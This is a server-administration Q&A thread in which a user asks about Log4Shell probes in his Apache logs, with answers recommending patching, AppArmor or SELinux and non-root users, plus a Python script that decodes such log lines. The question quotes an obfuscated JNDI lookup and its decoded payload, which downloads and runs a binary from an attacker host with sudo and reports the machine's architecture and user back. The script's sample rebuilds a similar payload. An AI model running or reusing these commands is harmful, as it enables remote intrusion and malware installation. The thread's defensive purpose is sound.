Score:0

apache remove wget for better security

za flag
Tim

I'm no expert at IT or Apache, but I have used Linux for years. I've done my best to harden/secure my server online, which I use for a mobile app that needs to serve up its content etc.

I've noticed some attempts at hacking my Apache 2.4.57 server (apparently?) using wget and log4j today. I do not have Tomcat, just a simple httpd running PHP.

Here's a log entry. (I've changed the IP ADDRESS info in the log entry to X.X.X.X. Also notice the status 200 return code, which meant it succeeded):

  [Sat Apr 08 16:08:57.428096 2023] [http:trace3] [pid 15227:tid 140593883580160] http_filters.c(1132): [client X.X.X.X:52832] Response sent with status 200, referer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//X.X.X.X:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTM0LjY1LjYyLjY0Ly5jb25maWcvemxpYjQ1IDsgY3VybCAtTyBodHRwOi8vMTM0LjY1LjYyLjY0Ly5jb25maWcvemxpYjQ1IDsgY2htb2QgK3ggemxpYjQ1IDsgY2htb2QgNzc3IHpsaWI0NSA7IC4vemxpYjQ1IDIgOyBzdWRvIC4vemxpYjQ1IDIgOyBybSAtcmYgemxpYjQ1OyBjdXJsIGh0dHA6Ly8xMjkuMTUxLjY0LjU1L2FyY2gvJCh1bmFtZSAtbSkvdXNlci8kKHdob2FtaSk7IHN1ZG8gY3VybCBodHRwOi8vMTI5LjE1MS42NC41NS9hcmNoLyQodW5hbWUgLW0pL3VzZXIvJCh3aG9hbWkp}')

Decoding the base64 gives (replaced IP ADDRESS with X.X.X.X):

  wget http://X.X.X.X/.config/zlib45 ; curl -O http://X.X.X.X/.config/zlib45 ; chmod +x zlib45 ; chmod 777 zlib45 ; ./zlib45 2 ; sudo ./zlib45 2 ; rm -rf zlib45; curl http://X.X.X.X/arch/$(uname -m)/user/$(whoami); sudo curl http://X.X.X.X/arch/$(uname -m)/user/$(whoami)

My question is, I already moved the wget executable to a different filename not guessable by someone, something like wget_wget for instance.

I also do not have any Java on my server, and I've searched for log4j and not found anything on that either (although it could be elsewhere or inside the Apache executable?).

So my questions are:

  1. Is removing/moving wget a good idea for better security?
  2. Since wget isn't a file that can be executed on my system, how did it return status 200?
  3. Did it really execute those commands on my server?
  4. Is it really using/running log4j on my system, based on the log entry?

I have multiple other log lines similar to this one from the same IP address, so I'd like suggestions and more expert opinions on what I'm seeing and how to better secure my server from this. I'm running fail2ban, but that won't stop this type of attack.

Thanks in advance!

Romeo Ninov avatar
in flag
I see more than one question. Please edit your question and ask only one question. If needed, create a new question for the next one, and so on.
in flag
`I do not have tomcat` so why bother?
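As an added example (not code from the question or any answer), here is a small Python triage script for log lines like the one above. It collapses the Log4j `${env:NaN:-x}` default-value lookups the attacker used to spell `jndi:ldap://` without writing it, reports whether the line contains a JNDI lookup, decodes the `/Command/Base64/` payload so you can read what the probe wanted to run, and lists the risky tokens it contains. The sample line, the placeholder host `X.X.X.X` and the function names are constructed for this example; the Base64 payload is built at runtime from a constructed command so the script runs offline.

```python
from __future__ import annotations

import base64
import re
from dataclasses import dataclass, field
from typing import Optional

# Log4j lookups of the form ${env:NAME:-default} evaluate to "default" when NAME is
# unset; the attacker chains them to assemble "jndi:ldap://" piece by piece.
DEFAULT_LOOKUP = re.compile(r"\$\{[a-zA-Z]+:[^}:]*:-([^}]*)\}")
JNDI = re.compile(r"jndi:(ldap|ldaps|rmi|dns|iiop)://", re.IGNORECASE)
B64_COMMAND = re.compile(r"/Command/Base64/([A-Za-z0-9+/=]+)")
# Tokens worth flagging in a decoded payload (heuristic list, constructed for this example).
SUSPICIOUS = ("wget ", "curl ", "chmod 777", "sudo ", "rm -rf", "/tmp/")


def deobfuscate(text: str) -> str:
    """Replace ${x:y:-default} lookups with their defaults, repeating until stable."""
    prev = None
    while prev != text:
        prev = text
        text = DEFAULT_LOOKUP.sub(r"\1", text)
    return text


@dataclass
class Finding:
    jndi_uri: Optional[str] = None      # the de-obfuscated ${jndi:...} lookup, if any
    command: Optional[str] = None       # decoded Base64 payload, if present
    indicators: list[str] = field(default_factory=list)

    @property
    def is_log4shell_probe(self) -> bool:
        return self.jndi_uri is not None


def analyse_log_line(line: str) -> Finding:
    """Classify one Apache log line; benign lines return an empty Finding."""
    clean = deobfuscate(line)
    finding = Finding()
    m = JNDI.search(clean)
    if not m:
        return finding
    start = clean.rfind("${", 0, m.start())
    end = clean.find("}", m.end())
    finding.jndi_uri = clean[start + 2:end if end != -1 else len(clean)]
    b = B64_COMMAND.search(clean)
    if b:
        data = b.group(1)
        data += "=" * (-len(data) % 4)  # attackers often drop the padding
        try:
            cmd = base64.b64decode(data, validate=True).decode("utf-8", "replace")
        except ValueError as exc:
            cmd = f"<undecodable: {exc}>"
        finding.command = cmd
        finding.indicators = [tok.strip() for tok in SUSPICIOUS if tok in cmd]
    return finding


# Constructed sample line (not the poster's): same lookup obfuscation, placeholder host,
# and a payload encoded here so nothing real is embedded.
SAMPLE_COMMAND = "wget http://X.X.X.X/.config/zlib45 ; chmod 777 zlib45 ; sudo ./zlib45 2 ; rm -rf zlib45"
SAMPLE_B64 = base64.b64encode(SAMPLE_COMMAND.encode()).decode()
SAMPLE_LINE = (
    "[Sat Apr 08 16:08:57.428096 2023] [http:trace3] [pid 15227:tid 1] http_filters.c(1132): "
    "[client X.X.X.X:52832] Response sent with status 200, referer: "
    "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//X.X.X.X:1389"
    f"/TomcatBypass/Command/Base64/{SAMPLE_B64}" + "}')"
)
BENIGN_LINE = "[client X.X.X.X:1] Response sent with status 200, referer: https://example.com/"

if __name__ == "__main__":
    for line in (SAMPLE_LINE, BENIGN_LINE):
        f = analyse_log_line(line)
        print("probe" if f.is_log4shell_probe else "benign", f.jndi_uri, f.command, f.indicators)
```

The HTTP 200 in the line is Apache's answer to the request carrying the lookup string in its Referer header; this script only tells you what the probe carried, not whether anything on the host evaluated it, which is what the presence of a Log4j-based application would decide.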
Score:1
ar flag

What you're doing is likely to break your system. It's not likely to hamper progress for an attacker.

You should:

  1. Maintain a patched system, so that known vulnerabilities can not be exploited.
  2. Look into using a solution such as AppArmor or SELinux to limit what Apache can do.

You should not start renaming system utilities. First, it's liable to break your system, and second, it won't work - there are too many utilities that are useful to an attacker. For instance, Python has methods to grab a URL. Or Perl. Or PHP. Or ... likely at least ten other ways.

SELinux or AppArmor can limit what software can do. It can ensure that your apache user can't execute commands, yet allow your user (and other system users) the right to do so.

Tim avatar
za flag
Tim
While I agree with everything you said, I'm the only user on the system. I don't ever use wget, and even though an attacker can use other attack vectors, I still think it's a good idea to close whatever potential open doors I can if it's easy to do. Since almost every attack I see is with wget, it makes sense to shut that down for now while I look for a real solution. I will look into AppArmor or SELinux as well, however. Thank you for your advice. I appreciate it.
vidarlo avatar
ar flag
You risk breaking your system because some other tool relies on it. You could also investigate a solution such as Cloudflare or mod_security to wash requests a bit.
Score:0
ec flag

My humble opinion is that wget isn't harmful at all. It's a tool like curl for HTTP requests. Even if the attacker is able to upload something to your system, e.g. by using wget to download it, the permissions of the user that executes it are the problem, and of course the chmod 777. Just patch the system on a regular basis and use a non-sudo, non-root user for the tasks (add the needed permissions for the user in /etc/sudoers).
